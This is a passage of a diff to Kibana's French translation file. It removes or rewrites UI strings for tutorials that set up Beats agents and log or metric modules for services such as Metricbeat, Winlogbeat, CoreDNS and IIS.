Consultez le [guide de démarrage rapide]({link}).", "home.tutorials.common.heartbeatInstructions.install.osxTitle": "Télécharger et installer Heartbeat", - "home.tutorials.common.heartbeatInstructions.install.rpmTextPre": "Vous utilisez Heartbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", "home.tutorials.common.heartbeatInstructions.install.rpmTitle": "Télécharger et installer Heartbeat", - "home.tutorials.common.heartbeatInstructions.install.windowsTextPre": "Vous utilisez Heartbeat pour la première fois ? Consultez le [guide de démarrage rapide]({heartbeatLink}).\n 1. Téléchargez le fichier .zip Heartbeat pour Windows via la page [Télécharger]({elasticLink}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Heartbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Heartbeat en tant que service Windows.", "home.tutorials.common.heartbeatInstructions.install.windowsTitle": "Télécharger et installer Heartbeat", "home.tutorials.common.heartbeatInstructions.start.debTextPre": "La commande ''setup'' charge le modèle d'indexation Kibana.", "home.tutorials.common.heartbeatInstructions.start.debTitle": "Lancer Heartbeat", 
@@ -4161,56 +3396,25 @@ "home.tutorials.common.heartbeatStatusCheck.successText": "Des données ont été reçues de Heartbeat.", "home.tutorials.common.heartbeatStatusCheck.text": "Vérifier que des données sont reçues de Heartbeat", "home.tutorials.common.heartbeatStatusCheck.title": "Statut de Heartbeat", - "home.tutorials.common.logstashInstructions.install.java.osxTextPre": "Suivez les instructions d'installation [ici]({link}).", "home.tutorials.common.logstashInstructions.install.java.osxTitle": "Télécharger et installer l'environnement d'exécution Java", - "home.tutorials.common.logstashInstructions.install.java.windowsTextPre": "Suivez les instructions d'installation [ici]({link}).", "home.tutorials.common.logstashInstructions.install.java.windowsTitle": "Télécharger et installer l'environnement d'exécution Java", - "home.tutorials.common.logstashInstructions.install.logstash.osxTextPre": "Vous utilisez Logstash pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", "home.tutorials.common.logstashInstructions.install.logstash.osxTitle": "Télécharger et installer Logstash", - "home.tutorials.common.logstashInstructions.install.logstash.windowsTextPre": "Vous utilisez Logstash pour la première fois ? Consultez le [guide de démarrage rapide]({logstashLink}).\n 1. [Téléchargez]({elasticLink}) le fichier .zip Logstash pour Windows.\n 2. 
Extrayez le contenu du fichier compressé.", "home.tutorials.common.logstashInstructions.install.logstash.windowsTitle": "Télécharger et installer Logstash", "home.tutorials.common.metricbeat.cloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.metricbeat.premCloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.metricbeat.premInstructions.gettingStarted.title": "Commencer", - "home.tutorials.common.metricbeatCloudInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.metricbeatCloudInstructions.config.debTitle": "Modifier la configuration", - "home.tutorials.common.metricbeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.metricbeatCloudInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.metricbeatCloudInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.metricbeatCloudInstructions.config.rpmTitle": "Modifier la configuration", - "home.tutorials.common.metricbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.metricbeatCloudInstructions.config.windowsTitle": "Modifier la configuration", - "home.tutorials.common.metricbeatEnableInstructions.debTextPost": "Modifiez les paramètres dans le fichier ''/etc/metricbeat/modules.d/{moduleName}.yml''.", - "home.tutorials.common.metricbeatEnableInstructions.debTitle": "Activer et configurer le module {moduleName}", - "home.tutorials.common.metricbeatEnableInstructions.osxTextPost": "Modifiez les paramètres dans le fichier ''modules.d/{moduleName}.yml''.", - "home.tutorials.common.metricbeatEnableInstructions.osxTextPre": "Dans le répertoire d'installation, exécutez la commande 
suivante :", - "home.tutorials.common.metricbeatEnableInstructions.osxTitle": "Activer et configurer le module {moduleName}", - "home.tutorials.common.metricbeatEnableInstructions.rpmTextPost": "Modifiez les paramètres dans le fichier ''/etc/metricbeat/modules.d/{moduleName}.yml''.", - "home.tutorials.common.metricbeatEnableInstructions.rpmTitle": "Activer et configurer le module {moduleName}", - "home.tutorials.common.metricbeatEnableInstructions.windowsTextPost": "Modifiez les paramètres dans le fichier ''modules.d/{moduleName}.yml''.", - "home.tutorials.common.metricbeatEnableInstructions.windowsTextPre": "Dans le dossier {path}, exécutez la commande suivante :", - "home.tutorials.common.metricbeatEnableInstructions.windowsTitle": "Activer et configurer le module {moduleName}", - "home.tutorials.common.metricbeatInstructions.config.debTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. 
[Learn more]({linkUrl}).", - "home.tutorials.common.metricbeatInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.metricbeatEnableInstructions.osxTextPre": "Dans le répertoire d'installation, exécutez la commande suivante :", "home.tutorials.common.metricbeatInstructions.config.debTitle": "Modifier la configuration", - "home.tutorials.common.metricbeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.metricbeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.metricbeatInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.metricbeatInstructions.config.rpmTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. 
À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).",
- "home.tutorials.common.metricbeatInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion :",
 "home.tutorials.common.metricbeatInstructions.config.rpmTitle": "Modifier la configuration",
- "home.tutorials.common.metricbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).",
- "home.tutorials.common.metricbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :",
 "home.tutorials.common.metricbeatInstructions.config.windowsTitle": "Modifier la configuration",
- "home.tutorials.common.metricbeatInstructions.install.debTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({link}).",
- "home.tutorials.common.metricbeatInstructions.install.debTextPre": "Vous utilisez Metricbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).",
 "home.tutorials.common.metricbeatInstructions.install.debTitle": "Télécharger et installer Metricbeat",
- "home.tutorials.common.metricbeatInstructions.install.osxTextPre": "Vous utilisez Metricbeat pour la première fois ? 
Consultez le [guide de démarrage rapide]({link}).",
 "home.tutorials.common.metricbeatInstructions.install.osxTitle": "Télécharger et installer Metricbeat",
- "home.tutorials.common.metricbeatInstructions.install.rpmTextPre": "Vous utilisez Metricbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).",
 "home.tutorials.common.metricbeatInstructions.install.rpmTitle": "Télécharger et installer Metricbeat",
- "home.tutorials.common.metricbeatInstructions.install.windowsTextPost": "Modifiez les paramètres sous ''output.elasticsearch'' dans le fichier {path} afin de pointer vers votre installation Elasticsearch.",
- "home.tutorials.common.metricbeatInstructions.install.windowsTextPre": "Vous utilisez Metricbeat pour la première fois ? Consultez le [guide de démarrage rapide]({metricbeatLink}).\n 1. Téléchargez le fichier .zip Metricbeat pour Windows via la page [Télécharger]({elasticLink}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Metricbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Metricbeat en tant que service Windows.",
 "home.tutorials.common.metricbeatInstructions.install.windowsTitle": "Télécharger et installer Metricbeat",
 "home.tutorials.common.metricbeatInstructions.start.debTextPre": "La commande ''setup'' charge les tableaux de bord Kibana. Si les tableaux de bord sont déjà configurés, omettez cette commande.",
 "home.tutorials.common.metricbeatInstructions.start.debTitle": "Lancer Metricbeat",
@@ -4223,22 +3427,14 @@
 "home.tutorials.common.metricbeatStatusCheck.buttonLabel": "Vérifier les données",
 "home.tutorials.common.metricbeatStatusCheck.errorText": "Aucune donnée n'a encore été reçue de ce module.",
 "home.tutorials.common.metricbeatStatusCheck.successText": "Des données ont été reçues de ce module.",
- "home.tutorials.common.metricbeatStatusCheck.text": "Vérifier que des données sont reçues du module Metricbeat \"{moduleName}\"",
 "home.tutorials.common.metricbeatStatusCheck.title": "Statut du module",
- "home.tutorials.common.premCloudInstructions.option1.textPre": "Rendez-vous sur [Elastic Cloud]({link}). Enregistrez-vous si vous n'avez pas encore de compte. Un essai gratuit de 14 jours est disponible.\n\nConnectez-vous à la console Elastic Cloud.\n\nPour créer un cluster, dans la console Elastic Cloud :\n 1. Sélectionnez **Créer un déploiement** et spécifiez le **Nom du déploiement**.\n 2. Modifiez les autres options de déploiement selon les besoins (sinon, les valeurs par défaut sont très bien pour commencer).\n 3. Cliquer sur **Créer un déploiement**\n 4. Attendre la fin de la création du déploiement\n 5. 
Accéder à la nouvelle instance cloud Kibana et suivre les instructions de la page d'accueil de Kibana",
- "home.tutorials.common.premCloudInstructions.option1.title": "Option 1 : essayer dans Elastic Cloud",
- "home.tutorials.common.premCloudInstructions.option2.textPre": "Si vous exécutez cette instance Kibana sur une instance Elasticsearch hébergée, passez à la configuration manuelle.\n\nEnregistrez le point de terminaison **Elasticsearch** en tant que {urlTemplate} et le cluster **Mot de passe** en tant que {passwordTemplate} pour les conserver.",
- "home.tutorials.common.premCloudInstructions.option2.title": "Option 2 : connecter un Kibana local à une instance cloud",
+ "home.tutorials.common.premCloudInstructions.option1.title": "Option 1 : essayer dans Elastic Cloud",
+ "home.tutorials.common.premCloudInstructions.option2.title": "Option 2 : connecter un Kibana local à une instance cloud",
 "home.tutorials.common.winlogbeat.cloudInstructions.gettingStarted.title": "Premiers pas",
 "home.tutorials.common.winlogbeat.premCloudInstructions.gettingStarted.title": "Commencer",
 "home.tutorials.common.winlogbeat.premInstructions.gettingStarted.title": "Commencer",
- "home.tutorials.common.winlogbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :",
 "home.tutorials.common.winlogbeatCloudInstructions.config.windowsTitle": "Modifier la configuration",
- "home.tutorials.common.winlogbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. 
À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).",
- "home.tutorials.common.winlogbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :",
 "home.tutorials.common.winlogbeatInstructions.config.windowsTitle": "Modifier la configuration",
- "home.tutorials.common.winlogbeatInstructions.install.windowsTextPost": "Modifiez les paramètres sous \"output.elasticsearch\" dans le fichier {path} afin de pointer vers votre installation Elasticsearch.",
- "home.tutorials.common.winlogbeatInstructions.install.windowsTextPre": "Vous utilisez Winlogbeat pour la première fois ? Consultez le [guide de démarrage rapide]({winlogbeatLink}).\n 1. Téléchargez le fichier .zip Winlogbeat pour Windows via la page [Télécharger]({elasticLink}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Winlogbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Winlogbeat en tant que service Windows.",
 "home.tutorials.common.winlogbeatInstructions.install.windowsTitle": "Télécharger et installer Winlogbeat",
 "home.tutorials.common.winlogbeatInstructions.start.windowsTextPre": "La commande \"setup\" charge les tableaux de bord Kibana. Si les tableaux de bord sont déjà configurés, omettez cette commande.",
 "home.tutorials.common.winlogbeatInstructions.start.windowsTitle": "Lancer Winlogbeat",
@@ -4248,425 +3444,350 @@
 "home.tutorials.common.winlogbeatStatusCheck.text": "Vérifier que des données sont reçues de Winlogbeat",
 "home.tutorials.common.winlogbeatStatusCheck.title": "Statut du module",
 "home.tutorials.consulMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Consul",
- "home.tutorials.consulMetrics.longDescription": "Le module Metricbeat \"consul\" récupère des indicateurs depuis Consul. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.consulMetrics.nameTitle": "Indicateurs Consul",
 "home.tutorials.consulMetrics.shortDescription": "Collectez les indicateurs à partir des serveurs Consul avec Metricbeat.",
 "home.tutorials.corednsLogs.artifacts.dashboards.linkLabel": "Aperçu de [Filebeat CoreDNS]",
- "home.tutorials.corednsLogs.longDescription": "Il s'agit d'un module Filebeat pour CoreDNS. Celui-ci prend en charge les déploiements CoreDNS autonomes et les déploiements CoreDNS dans Kubernetes. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.corednsLogs.nameTitle": "Logs CoreDNS",
 "home.tutorials.corednsLogs.shortDescription": "Collectez et analysez les logs à partir des serveurs CoreDNS avec Filebeat.",
 "home.tutorials.corednsMetrics.artifacts.application.label": "Découverte",
- "home.tutorials.corednsMetrics.longDescription": "Le module Metricbeat \"coredns\" récupère des indicateurs depuis CoreDNS. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.corednsMetrics.nameTitle": "Indicateurs CoreDNS",
 "home.tutorials.corednsMetrics.shortDescription": "Collectez les indicateurs à partir des serveurs CoreDNS avec Metricbeat.",
 "home.tutorials.couchbaseMetrics.artifacts.application.label": "Découverte",
- "home.tutorials.couchbaseMetrics.longDescription": "Le module Metricbeat \"couchbase\" récupère des indicateurs depuis Couchbase. 
[En savoir plus]({learnMoreLink}).",
 "home.tutorials.couchbaseMetrics.nameTitle": "Indicateurs Couchbase",
 "home.tutorials.couchbaseMetrics.shortDescription": "Collectez les indicateurs à partir des bases de données Couchbase avec Metricbeat.",
 "home.tutorials.couchdbMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs CouchDB",
- "home.tutorials.couchdbMetrics.longDescription": "Le module Metricbeat \"couchdb\" récupère des indicateurs depuis CouchDB. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.couchdbMetrics.nameTitle": "Indicateurs CouchDB",
 "home.tutorials.couchdbMetrics.shortDescription": "Collectez les indicateurs à partir des serveurs CouchDB avec Metricbeat.",
 "home.tutorials.crowdstrikeLogs.artifacts.dashboards.linkLabel": "Application Security",
- "home.tutorials.crowdstrikeLogs.longDescription": "Il s'agit du module Filebeat pour CrowdStrike Falcon utilisant le [connecteur SIEM](https://www.crowdstrike.com/blog/tech-center/integrate-with-your-siem) Falcon. Ce module collecte ces données, les convertit en ECS et les ingère pour les afficher dans le SIEM. Par défaut, le connecteur SIEM Falcon génère les données d'événement de l'API de streaming Falcon au format JSON. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.crowdstrikeLogs.nameTitle": "Logs CrowdStrike",
 "home.tutorials.crowdstrikeLogs.shortDescription": "Collectez et analysez les logs à partir de CrowdStrike Falcon à l'aide du Falcon SIEM Connector avec Filebeat.",
 "home.tutorials.cylanceLogs.artifacts.dashboards.linkLabel": "Application Security",
- "home.tutorials.cylanceLogs.longDescription": "Ce module permet de recevoir des logs CylancePROTECT par le biais de Syslog ou d'un fichier. 
[En savoir plus]({learnMoreLink}).",
 "home.tutorials.cylanceLogs.nameTitle": "Logs CylancePROTECT",
 "home.tutorials.cylanceLogs.shortDescription": "Collectez et analysez les logs à partir de CylancePROTECT avec Filebeat.",
 "home.tutorials.dockerMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Docker",
- "home.tutorials.dockerMetrics.longDescription": "Le module Metricbeat \"docker\" récupère des indicateurs depuis le serveur Docker. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.dockerMetrics.nameTitle": "Indicateurs Docker",
 "home.tutorials.dockerMetrics.shortDescription": "Collectez les indicateurs à partir des conteneurs Docker avec Metricbeat.",
 "home.tutorials.dropwizardMetrics.artifacts.application.label": "Découverte",
- "home.tutorials.dropwizardMetrics.longDescription": "Le module Metricbeat \"dropwizard\" récupère des indicateurs depuis l'application Java Dropwizard. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.dropwizardMetrics.nameTitle": "Indicateurs Dropwizard",
 "home.tutorials.dropwizardMetrics.shortDescription": "Collectez les indicateurs à partir des applications Dropwizard Java avec Metricbeat.",
 "home.tutorials.elasticsearchLogs.artifacts.application.label": "Découverte",
- "home.tutorials.elasticsearchLogs.longDescription": "Le module Filebeat \"elasticsearch\" analyse les logs créés par Elasticsearch. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.elasticsearchLogs.nameTitle": "Logs Elasticsearch",
 "home.tutorials.elasticsearchLogs.shortDescription": "Collectez et analysez les logs à partir des clusters Elasticsearch avec Filebeat.",
 "home.tutorials.elasticsearchMetrics.artifacts.application.label": "Découverte",
- "home.tutorials.elasticsearchMetrics.longDescription": "Le module Metricbeat \"elasticsearch\" récupère des indicateurs depuis Elasticsearch. 
[En savoir plus]({learnMoreLink}).",
 "home.tutorials.elasticsearchMetrics.nameTitle": "Indicateurs Elasticsearch",
 "home.tutorials.elasticsearchMetrics.shortDescription": "Collectez les indicateurs à partir de clusters Elasticsearch avec Metricbeat.",
- "home.tutorials.envoyproxyLogs.artifacts.dashboards.linkLabel": "Aperçu d'Envoy Proxy",
- "home.tutorials.envoyproxyLogs.longDescription": "Il s'agit d'un module Filebeat pour le log d'accès à Envoy Proxy (https://www.envoyproxy.io/docs/envoy/v1.10.0/configuration/access_log). Celui-ci prend en charge les déploiements autonomes et les déploiements Envoy Proxy dans Kubernetes. [Learn more]({learnMoreLink}).",
- "home.tutorials.envoyproxyLogs.nameTitle": "Logs Envoy Proxy",
+ "home.tutorials.envoyproxyLogs.artifacts.dashboards.linkLabel": "Aperçu d'Envoy Proxy",
+ "home.tutorials.envoyproxyLogs.nameTitle": "Logs Envoy Proxy",
 "home.tutorials.envoyproxyLogs.shortDescription": "Collectez et analysez les logs à partir d'Envoy Proxy avec Filebeat.",
- "home.tutorials.envoyproxyMetrics.longDescription": "Le module Metricbeat \"envoyproxy\" récupère des indicateurs depuis Envoy Proxy. [En savoir plus]({learnMoreLink}).",
- "home.tutorials.envoyproxyMetrics.nameTitle": "Indicateurs Envoy Proxy",
+ "home.tutorials.envoyproxyMetrics.nameTitle": "Indicateurs Envoy Proxy",
 "home.tutorials.envoyproxyMetrics.shortDescription": "Collectez les indicateurs à partir d'Envoy Proxy avec Metricbeat.",
 "home.tutorials.etcdMetrics.artifacts.application.label": "Découverte",
- "home.tutorials.etcdMetrics.longDescription": "Le module Metricbeat \"etcd\" récupère des indicateurs depuis Etcd. 
[En savoir plus]({learnMoreLink}).",
 "home.tutorials.etcdMetrics.nameTitle": "Indicateurs Etcd",
 "home.tutorials.etcdMetrics.shortDescription": "Collectez les indicateurs à partir des serveurs Etcd avec Metricbeat.",
 "home.tutorials.f5Logs.artifacts.dashboards.linkLabel": "Application Security",
- "home.tutorials.f5Logs.longDescription": "Ce module permet de recevoir des logs Big-IP Access Policy Manager par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).",
- "home.tutorials.f5Logs.nameTitle": "Logs F5",
+ "home.tutorials.f5Logs.nameTitle": "Logs F5",
 "home.tutorials.f5Logs.shortDescription": "Collectez et analysez les logs à partir de F5 Big-IP Access Policy Manager avec Filebeat.",
 "home.tutorials.fortinetLogs.artifacts.dashboards.linkLabel": "Application Security",
- "home.tutorials.fortinetLogs.longDescription": "Il s'agit d'un module pour les logs Fortinet FortiOS envoyés au format Syslog. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.fortinetLogs.nameTitle": "Logs Fortinet",
 "home.tutorials.fortinetLogs.shortDescription": "Collectez et analysez les logs à partir de Fortinet FortiOS avec Filebeat.",
 "home.tutorials.gcpLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs d'audit",
- "home.tutorials.gcpLogs.longDescription": "Il s'agit d'un module pour les logs Google Cloud. Il prend en charge la lecture des logs d'audit, de flux VPC et de pare-feu qui ont été exportés depuis Stackdriver dans un récepteur de rubriques Google Pub/Sub. 
[En savoir plus]({learnMoreLink}).",
- "home.tutorials.gcpLogs.nameTitle": "Logs Google Cloud",
+ "home.tutorials.gcpLogs.nameTitle": "Logs Google Cloud",
 "home.tutorials.gcpLogs.shortDescription": "Collectez et analysez les logs à partir de Google Cloud Platform avec Filebeat.",
- "home.tutorials.gcpMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Google Cloud",
- "home.tutorials.gcpMetrics.longDescription": "Le module Metricbeat \"gcp\" récupère des indicateurs depuis Google Cloud Platform à l'aide de l'API de monitoring Stackdriver. [En savoir plus]({learnMoreLink}).",
- "home.tutorials.gcpMetrics.nameTitle": "Indicateurs Google Cloud",
+ "home.tutorials.gcpMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Google Cloud",
+ "home.tutorials.gcpMetrics.nameTitle": "Indicateurs Google Cloud",
 "home.tutorials.gcpMetrics.shortDescription": "Collectez les indicateurs à partir de Google Cloud Platform avec Metricbeat.",
 "home.tutorials.golangMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Golang",
- "home.tutorials.golangMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis une application Golang. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.golangMetrics.nameTitle": "Indicateurs Golang",
 "home.tutorials.golangMetrics.shortDescription": "Collectez les indicateurs à partir d'applications Golang avec Metricbeat.",
 "home.tutorials.gsuiteLogs.artifacts.dashboards.linkLabel": "Application Security",
- "home.tutorials.gsuiteLogs.longDescription": "Il s'agit d'un module pour l'ingestion de données depuis les différentes API de rapports d'audit GSuite. 
[En savoir plus]({learnMoreLink}).",
 "home.tutorials.gsuiteLogs.nameTitle": "Logs GSuite",
 "home.tutorials.gsuiteLogs.shortDescription": "Collectez et analysez les rapports d'activité à partir de GSuite avec Filebeat.",
 "home.tutorials.haproxyLogs.artifacts.dashboards.linkLabel": "Aperçu de HAProxy",
- "home.tutorials.haproxyLogs.longDescription": "Le module collecte et analyse les logs d'un processus (\"haproxy\") [En savoir plus]({learnMoreLink}).",
 "home.tutorials.haproxyLogs.nameTitle": "Logs HAProxy",
 "home.tutorials.haproxyLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs HAProxy avec Filebeat.",
 "home.tutorials.haproxyMetrics.artifacts.application.label": "Découverte",
- "home.tutorials.haproxyMetrics.longDescription": "Le module Metricbeat \"haproxy\" récupère des indicateurs depuis HAProxy. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.haproxyMetrics.nameTitle": "Indicateurs HAProxy",
 "home.tutorials.haproxyMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs HAProxy avec Metricbeat.",
- "home.tutorials.ibmmqLogs.artifacts.dashboards.linkLabel": "Événements IBM MQ",
- "home.tutorials.ibmmqLogs.longDescription": "Collectez des logs IBM MQ avec Filebeat. [En savoir plus]({learnMoreLink}).",
- "home.tutorials.ibmmqLogs.nameTitle": "Logs IBM MQ",
+ "home.tutorials.ibmmqLogs.artifacts.dashboards.linkLabel": "Événements IBM MQ",
+ "home.tutorials.ibmmqLogs.nameTitle": "Logs IBM MQ",
 "home.tutorials.ibmmqLogs.shortDescription": "Collectez et analysez les logs à partir d'IBM MQ avec Filebeat.",
 "home.tutorials.ibmmqMetrics.artifacts.application.label": "Découverte",
- "home.tutorials.ibmmqMetrics.longDescription": "Le module Metricbeat \"ibmmq\" récupère des indicateurs depuis les instances IBM MQ. 
[En savoir plus]({learnMoreLink}).",
- "home.tutorials.ibmmqMetrics.nameTitle": "Indicateurs IBM MQ",
+ "home.tutorials.ibmmqMetrics.nameTitle": "Indicateurs IBM MQ",
 "home.tutorials.ibmmqMetrics.shortDescription": "Collectez les indicateurs à partir d'instances IBM MQ avec Metricbeat.",
 "home.tutorials.icingaLogs.artifacts.dashboards.linkLabel": "Log principal Icinga",
- "home.tutorials.icingaLogs.longDescription": "Le module analyse le log principal et les logs de débogage et de démarrage d'[Icinga](https://www.icinga.com/products/icinga-2/). [En savoir plus]({learnMoreLink}).",
 "home.tutorials.icingaLogs.nameTitle": "Logs Icinga",
 "home.tutorials.icingaLogs.shortDescription": "Collectez et analysez les logs principaux, de débogage et de démarrage à partir d'Icinga avec Filebeat.",
- "home.tutorials.iisLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs IIS",
- "home.tutorials.iisLogs.longDescription": "Le module Filebeat \"iis\" analyse les logs d'accès et d'erreurs créés par le serveur HTTP IIS. [En savoir plus]({learnMoreLink}).",
- "home.tutorials.iisLogs.nameTitle": "Logs IIS",
+ "home.tutorials.iisLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs IIS",
+ "home.tutorials.iisLogs.nameTitle": "Logs IIS",
 "home.tutorials.iisLogs.shortDescription": "Collectez et analysez les logs à partir d'accès et d'erreurs à partir des serveurs HTTP IIS avec Filebeat.",
- "home.tutorials.iisMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs IIS",
- "home.tutorials.iisMetrics.longDescription": "Le module Metricbeat \"iis\" collecte les indicateurs du serveur IIS ainsi que des sites web et des pools d'applications en cours d'exécution. 
[En savoir plus]({learnMoreLink}).",
- "home.tutorials.iisMetrics.nameTitle": "Indicateurs IIS",
+ "home.tutorials.iisMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs IIS",
+ "home.tutorials.iisMetrics.nameTitle": "Indicateurs IIS",
 "home.tutorials.iisMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs HTTP IIS avec Metricbeat.",
 "home.tutorials.impervaLogs.artifacts.dashboards.linkLabel": "Application Security",
- "home.tutorials.impervaLogs.longDescription": "Ce module permet de recevoir des logs Imperva SecureSphere par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.impervaLogs.nameTitle": "Logs Imperva",
 "home.tutorials.impervaLogs.shortDescription": "Collectez et analysez les logs à partir d'Imperva SecureSphere avec Filebeat.",
 "home.tutorials.infobloxLogs.artifacts.dashboards.linkLabel": "Application Security",
- "home.tutorials.infobloxLogs.longDescription": "Ce module permet de recevoir des logs Infoblox NIOS par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.infobloxLogs.nameTitle": "Logs Infoblox",
 "home.tutorials.infobloxLogs.shortDescription": "Collectez et analysez les logs à partir d'Infoblox NIOS avec Filebeat.",
 "home.tutorials.iptablesLogs.artifacts.dashboards.linkLabel": "Aperçu d'Iptables",
